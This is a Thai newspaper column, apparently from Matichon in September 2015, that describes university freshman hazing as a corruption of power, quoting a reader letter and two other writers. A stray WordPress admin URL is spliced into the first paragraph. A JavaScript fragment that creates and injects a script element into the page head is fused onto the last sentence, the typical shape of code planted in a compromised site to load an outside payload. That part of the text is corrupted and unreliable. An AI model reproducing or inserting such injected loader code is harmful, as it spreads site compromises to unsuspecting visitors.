Download PDF

มติชนรายวัน ฉบับประจำวันศุกร์ที่ 18 กันยายน 2558

 

อำนาจรับน้องใหม่

          รับน้องใหม่เป็นพิธีกรรมอย่างหนึ่งที่ปฏิเสธมิได้ของสังคมไทยปัจจุบันhttp://www.sujitwongthes.com/wp-admin/edit.php

          ทั้งนี้เพื่อจัดระเบียบการเมืองของชนชั้นนำในมหาวิทยาลัย ที่บรรดาอาจารย์รู้เห็นเป็นใจและให้ท้าย(เพื่อประโยชน์ของอาจารย์)

          และเพื่อคอร์รัปต์อำนาจของคนอื่น (นักศึกษาใหม่) ไปเป็นอำนาจของตน (นักศึกษาเก่า)

          เรื่องนี้ บ.ก. ฟอรั่ม มติชน ตอบ “คนบางซ่อน” ที่เขียนจดหมายถึงมติชน (ฉบับวันอาทิตย์ที่ 13 กันยายน 2558 หน้า 4) จะคัดมาเป็นพยาน ดังนี้

          “การรับน้องในมหาวิทยาลัย สถาบันการศึกษาต่างๆ ตอนหลังๆ โรงเรียนมัธยมเอาบ้าง ล้วนแต่มี ‘ครู’ อยู่เบื้องหลังทั้งสิ้น อาจเป็นครูที่มีแนวคิดล้าหลัง คลั่งระบบซีเนียริตี้

          นอกจากนี้ก็คือ ‘รุ่นพี่’ ที่ไปไหนไม่รอด มาสร้างวัฒนธรรมพี่ๆ น้องๆ เพื่อให้ตัวเองมีสถานะไว้อ้างอิง อย่างน้อยๆ ก็มีรุ่นน้องมายกมือไหว้

          ถ้าแต่ละสถาบันการศึกษาเอาจริง เรื่องจะจบ แต่ถ้าลูบหน้าปะจมูก ใช้วิธีกลบเกลื่อนปัญหาอย่างที่กำลังทำอยู่ นานไปจะกลายเป็นแดนสนธยา แทนที่จะสว่างไสวด้วยปัญญาก็กลายเป็นอย่างอื่นไป

 

การเมืองของชนชั้นนำ

          “ประชาธิปไตยที่ไม่เป็นเครื่องมือทางอำนาจของประชาชน—–คือจุดประสงค์ของการจัดระเบียบการเมืองของชนชั้นนำ”

          นิธิ เอียวศรีวงศ์ [บทความเรื่อง ร่างใหม่ให้เหมือนเก่า แต่ไม่เหมือนเก่า พิมพ์ในมติชน ฉบับวันจันทร์ที่ 14 กันยายน 2558 หน้า 20]

 

คอร์รัปต์อำนาจ

          คอร์รัปต์อำนาจ หน้าตาเป็นยังไง?

          มีคำอธิบายอยู่ในข้อเขียนแหลมคมเรื่องชีวิตเส็งเคร็ง โดย คำ ผกา ใน มติชนสุดสัปดาห์ (ฉบับวันที่ 11-17 กันยายน 2558 หน้า 96) โดยสรุป ดังนี้

          คอร์รัปชั่น หมายถึง การใช้อำนาจสาธารณะในทางที่ผิด รวมถึงการละเมิดลดทอนศักดิ์ศรีของความเป็นมนุษย์ ทั้งหมดนี้จะโดยเกี่ยวข้องกับเรื่องเงินทอง หรือไม่เกี่ยวข้องเลยก็ได้

          “คอร์รัปต์” ที่ร้ายกาจที่สุด คือการคอร์รัปต์ของอำนาจ การใช้อำนาจไปในทางที่ผิด และย่อมหมายรวมถึงการ “ขโมย” อำนาจด้วย คือคอร์รัปต์อำนาจของประชาชนไปเป็นอำนาจของตนvar d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);